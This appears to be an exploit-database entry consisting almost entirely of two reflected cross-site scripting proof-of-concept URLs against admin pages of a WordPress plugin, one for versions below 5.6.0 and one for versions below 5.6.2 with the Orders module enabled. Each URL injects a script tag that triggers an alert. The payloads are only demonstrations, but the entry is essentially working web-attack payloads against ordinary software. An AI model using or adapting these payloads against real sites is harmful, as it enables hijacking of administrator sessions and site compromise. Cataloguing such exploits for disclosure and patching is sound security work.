Share
## https://sploitus.com/exploit?id=WPEX-ID:F1790084-8C34-423F-90AA-773CB0F1C48D
v < 5.6.0 https://example.com/wp-admin/admin.php?page=wcj-tools&tab=custom_roles&a"><script>alert(/XSS/)</script>

v < 5.6.2 (except 5.5.9):

With the Orders module enabled, and "Admin Order Navigation" settings enabled: https://example.com/wp-admin/post.php?post=796&action=edit&a"><script>alert(/XSS/)</script>